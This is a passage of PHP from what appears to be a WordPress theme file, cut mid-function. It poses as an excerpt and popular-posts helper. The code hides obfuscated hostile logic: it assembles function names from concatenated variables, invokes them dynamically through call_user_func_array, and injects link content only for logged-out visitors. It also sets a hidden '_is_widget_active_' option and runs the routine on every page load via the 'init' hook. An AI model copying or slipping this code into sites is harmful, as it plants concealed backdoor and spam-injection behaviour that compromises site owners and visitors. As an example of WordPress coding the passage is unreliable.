	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($fixed_tags)) $fixed_tags=1;
	if(!isset($filters)) $filters=$home_filter; 
	if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
	if(!isset($tag_aditional)) $tag_aditional="div";
	if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($more_text_link)) $more_text_link="Continue reading this entry";	
	if(!isset($isshowdots)) $isshowdots=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($text_length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $text_length) {
				$l=$text_length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$link_text_more="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $tagsallowed) {
		$output=strip_tags($output, $tagsallowed);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fixed_tags) ? balanceTags($output, true) : $output;
	$output .= ($isshowdots && $ellipsis) ? "..." : "";
	$output=apply_filters($filter, $output);
	switch($tag_aditional) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($is_use_more_link ) {
		if($for_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_text_link . "\">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_text_link . "\">" . $link_text_more . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_getprepare_widget");

function _most_popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 		
?>